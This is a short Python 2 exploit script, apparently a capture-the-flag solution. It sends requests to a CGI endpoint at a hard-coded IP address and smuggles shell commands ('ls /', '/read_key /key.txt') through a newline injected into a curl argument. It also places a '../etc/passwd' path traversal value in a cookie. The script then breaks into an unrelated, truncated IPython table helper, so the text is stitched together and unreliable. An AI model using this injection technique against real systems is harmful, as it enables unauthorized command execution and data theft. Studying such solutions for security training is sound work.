import requests headers = dict() headers = {'User-Agent': 'Mozilla/5.0'} cookies = {"diagsess":"../etc/passwd"} # doesn't matter cmd =" ls /" payload = {"action": "curl", "arg": "aaa -w xxx\n"+cmd} r = requests.post("http://54.92.127.128:16888/cgi-bin/dana-na.cgi?sechash=", data=payload, cookies=cookies, headers=headers) print r.content[r.content.find(">xxx")+4:] cmd = "/read_key /key.txt" # or use python to read stderr # cmd = "python -c s=__import__('subprocess');print(s.check_output('/read_key'+chr(32)+'/key.txt',stderr=s.STDOUT,shell=True))" payload = {"action": "curl", "arg": "aaa -w xxx\n"+cmd} r = requests.post("http://54.92.127.128:16888/cgi-bin/dana-na.cgi?sechash=", data=payload, cookies=cookies, headers=headers) print r.content[r.content.find(">xxx")+4:] # BTW, attempts to find an admin password # from http://calebmadrigal.com/display-list-as-table-in-ipython-notebook/ class ListTable(list): """ Overridden list class which takes a 2-dimensional list of the form [[1,2,3],[4,5,6]], and renders an HTML Table in IPython Notebook. """ def _repr_html_(self): html = ["
{0} | ".format(col) for col in row) html.append("